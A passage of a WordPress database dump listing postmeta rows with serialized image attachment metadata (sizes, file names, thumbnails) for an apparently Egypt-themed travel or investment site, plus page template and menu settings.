utter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(20609,3274,'_wp_attachment_backup_sizes','a:9:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1920;s:6:\"height\";i:708;s:4:\"file\";s:10:\"Egypt2.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:18:\"Egypt2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5489;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:18:\"Egypt2-300x111.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:111;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6593;}s:17:\"medium_large-orig\";a:5:{s:4:\"file\";s:18:\"Egypt2-768x283.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30791;}s:10:\"large-orig\";a:5:{s:4:\"file\";s:19:\"Egypt2-1024x378.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:378;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51835;}s:14:\"1536x1536-orig\";a:5:{s:4:\"file\";s:19:\"Egypt2-1536x566.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:566;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111393;}s:11:\"awb_sm-orig\";a:5:{s:4:\"file\";s:18:\"Egypt2-500x184.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14721;}s:11:\"awb_md-orig\";a:5:{s:4:\"file\";s:18:\"Egypt2-800x295.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:295;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32941;}s:11:\"awb_lg-orig\";a:5:{s:4:\"file\";s:19:\"Egypt2-1280x472.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80014;}}'),
(20610,3276,'_wp_attached_file','2022/11/2022-10-24_104028.jpg'),
(20611,3276,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1597;s:6:\"height\";i:501;s:4:\"file\";s:29:\"2022/11/2022-10-24_104028.jpg\";s:8:\"filesize\";i:323497;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"2022-10-24_104028-300x94.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8907;}s:5:\"large\";a:5:{s:4:\"file\";s:30:\"2022-10-24_104028-1024x321.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:321;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81063;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"2022-10-24_104028-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6697;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:29:\"2022-10-24_104028-768x241.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:241;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47843;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:30:\"2022-10-24_104028-1536x482.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:482;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:168164;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:29:\"2022-10-24_104028-500x157.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:157;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22225;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:29:\"2022-10-24_104028-800x251.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:251;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51787;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:30:\"2022-10-24_104028-1280x402.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:402;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122993;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(20612,3277,'_wp_attached_file','2022/11/pyramids-of-Giza-in-Egypt.jpg'),
(20613,3277,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2121;s:6:\"height\";i:1414;s:4:\"file\";s:37:\"2022/11/pyramids-of-Giza-in-Egypt.jpg\";s:8:\"filesize\";i:88660;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"pyramids-of-Giza-in-Egypt-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14753;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"pyramids-of-Giza-in-Egypt-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:123256;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"pyramids-of-Giza-in-Egypt-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6943;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"pyramids-of-Giza-in-Egypt-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75475;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"pyramids-of-Giza-in-Egypt-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:234549;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:39:\"pyramids-of-Giza-in-Egypt-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:362863;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:37:\"pyramids-of-Giza-in-Egypt-500x333.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:333;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35692;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:37:\"pyramids-of-Giza-in-Egypt-800x533.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:533;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81096;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:38:\"pyramids-of-Giza-in-Egypt-1280x853.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:853;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:176301;}s:6:\"awb_xl\";a:5:{s:4:\"file\";s:39:\"pyramids-of-Giza-in-Egypt-1920x1280.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:1280;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:329910;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(20614,3278,'_wp_attached_file','2022/11/invest-901630488-e1668179786582.jpg'),
(20615,3278,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1366;s:6:\"height\";i:402;s:4:\"file\";s:43:\"2022/11/invest-901630488-e1668179786582.jpg\";s:8:\"filesize\";i:181617;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:42:\"invest-901630488-e1668179786582-300x88.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7507;}s:5:\"large\";a:5:{s:4:\"file\";s:44:\"invest-901630488-e1668179786582-1024x301.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:301;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65517;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:43:\"invest-901630488-e1668179786582-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7647;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:43:\"invest-901630488-e1668179786582-768x226.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39444;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:43:\"invest-901630488-e1668179786582-500x147.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:147;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18429;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:43:\"invest-901630488-e1668179786582-800x235.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42223;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:44:\"invest-901630488-e1668179786582-1280x377.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:377;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96889;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:27:\"Invest All Over Egypt Today\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:27:\"Invest All Over Egypt Today\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(20616,3278,'_wp_attachment_backup_sizes','a:8:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1366;s:6:\"height\";i:768;s:4:\"file\";s:20:\"invest-901630488.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:28:\"invest-901630488-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5229;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:28:\"invest-901630488-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9947;}s:17:\"medium_large-orig\";a:5:{s:4:\"file\";s:28:\"invest-901630488-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51390;}s:10:\"large-orig\";a:5:{s:4:\"file\";s:29:\"invest-901630488-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87132;}s:11:\"awb_sm-orig\";a:5:{s:4:\"file\";s:28:\"invest-901630488-500x281.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:281;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24021;}s:11:\"awb_md-orig\";a:5:{s:4:\"file\";s:28:\"invest-901630488-800x450.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:55860;}s:11:\"awb_lg-orig\";a:5:{s:4:\"file\";s:29:\"invest-901630488-1280x720.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:720;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:128986;}}'),
(20617,2920,'_thumbnail_id','3381'),
(20618,2920,'_wp_page_template','default'),
(20619,2920,'_dt_microsite_primary_menu',''),
(20620,2920,'_dt_microsite_split_left_menu',''),
(20621,2920,'_dt_microsite_split_right_menu',''),
(20622,2920,'_dt_microsite_mobile_menu',''),
(20623,2665,'_wp_page_template','default'),
(20624,2665,'_dt_microsite_primary_menu',''),
(20625,2665,'_dt_microsite_split_left_menu',''),
(20626,2665,'_dt_microsite_split_right_menu',''),
(20627,2665,'_dt_microsite_mobile_menu',''),
(20628,3281,'_wp_attached_file','2022/11/1-Cairo-Tower-e1668180780298.jpg'),
(20629,3281,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:650;s:6:\"height\";i:342;s:4:\"file\";s:40:\"2022/11/1-Cairo-Tower-e1668180780298.jpg\";s:8:\"filesize\";i:31188;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:40:\"1-Cairo-Tower-e1668180780298-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9656;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:40:\"1-Cairo-Tower-e1668180780298-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5485;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:40:\"1-Cairo-Tower-e1668180780298-500x263.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:263;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22136;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(20630,3281,'_wp_attachment_backup_sizes','a:4:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:650;s:6:\"height\";i:434;s:4:\"file\";s:17:\"1-Cairo-Tower.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:25:\"1-Cairo-Tower-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5294;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:25:\"1-Cairo-Tower-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10974;}s:11:\"awb_sm-orig\";a:5:{s:4:\"file\";s:25:\"1-Cairo-Tower-500x334.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:334;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25242;}}'),
(20631,2665,'_thumbnail_id','3241'),
(20632,3282,'_wp_attached_file','2022/11/360_F_71897150_qIJGwaXp01Kp2AwBpxQSzOcAyPbK0vVh.jpg'),
(20633,3282,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:640;s:6:\"height\";i:360;s:4:\"file\";s:59:\"2022/11/360_F_71897150_qIJGwaXp01Kp2AwBpxQSzOcAyPbK0vVh.jpg\";s:8:\"filesize\";i:94401;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"360_F_71897150_qIJGwaXp01Kp2AwBpxQSzOcAyPbK0vVh-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16807;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"360_F_71897150_qIJGwaXp01Kp2AwBpxQSzOcAyPbK0vVh-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7758;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:59:\"360_F_71897150_qIJGwaXp01Kp2AwBpxQSzOcAyPbK0vVh-500x281.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:281;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38685;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(20634,3283,'_wp_attached_file','2022/11/1664433062169.jpg'),
(20635,3283,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:620;s:6:\"height\";i:349;s:4:\"file\";s:25:\"2022/11/1664433062169.jpg\";s:8:\"filesize\";i:96882;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"1664433062169-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16819;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"1664433062169-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8133;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:25:\"1664433062169-500x281.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:281;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39115;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(20636,2675,'_thumbnail_id','3286'),
(20637,3285,'_wp_attached_file','2022/11/slide9.jpg'),
(20638,3285,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:18:\"2022/11/slide9.jpg\";s:8:\"filesize\";i:409283;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"slide9-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19969;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"slide9-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:172221;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"slide9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8391;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"slide9-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105582;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:18:\"slide9-500x333.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:333;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49845;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:18:\"slide9-800x533.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:533;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:114246;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(20639,3286,'_wp_attached_file','2022/11/slide92.jpg'),
(20640,3286,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:400;s:4:\"file\";s:19:\"2022/11/slide92.jpg\";s:8:\"filesize\";i:484659;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"slide92-300x94.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10082;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"slide92-1024x320.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81691;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"slide92-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7524;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"slide92-768x240.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50525;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:19:\"slide92-500x156.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:156;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24310;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:19:\"slide92-800x250.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54959;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(20641,3287,'_wp_attached_file','2022/11/intercontinental-cairo-7836282477-2x1-1.jpg'),
(20642,3287,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2400;s:6:\"height\";i:1200;s:4:\"file\";s:51:\"2022/11/intercontinental-cairo-7836282477-2x1-1.jpg\";s:8:\"filesize\";i:1251504;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:51:\"intercontinental-cairo-7836282477-2x1-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14949;}s:5:\"large\";a:5:{s:4:\"file\";s:52:\"intercontinental-cairo-7836282477-2x1-1-1024x512.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:178100;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:51:\"intercontinental-cairo-7836282477-2x1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7783;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:51:\"intercontinental-cairo-7836282477-2x1-1-768x384.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95771;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:52:\"intercontinental-cairo-7836282477-2x1-1-1536x768.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:417270;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:53:\"intercontinental-cairo-7836282477-2x1-1-2048x1024.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:736689;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:51:\"intercontinental-cairo-7836282477-2x1-1-500x250.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39918;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:51:\"intercontinental-cairo-7836282477-2x1-1-800x400.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:109349;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:52:\"intercontinental-cairo-7836282477-2x1-1-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:287134;}s:6:\"awb_xl\";a:5:{s:4:\"file\";s:52:\"intercontinental-cairo-7836282477-2x1-1-1920x960.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:960;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:653999;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(20643,2679,'_thumbnail_id','3287'),
(20644,3289,'_wp_attached_file','2022/11/282192719.jpg'),
(20645,3289,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:576;s:4:\"file\";s:21:\"2022/11/282192719.jpg\";s:8:\"filesize\";i:65255;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"282192719-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9079;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"282192719-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4576;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"282192719-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44913;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:21:\"282192719-500x281.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:281;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21643;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:21:\"282192719-800x450.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48202;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(20646,2685,'_thumbnail_id','3289'),
(20648,3291,'_wp_attached_file','2022/11/pexels-alphatradezone-5833807-scaled-e1668184706761.jpg'),
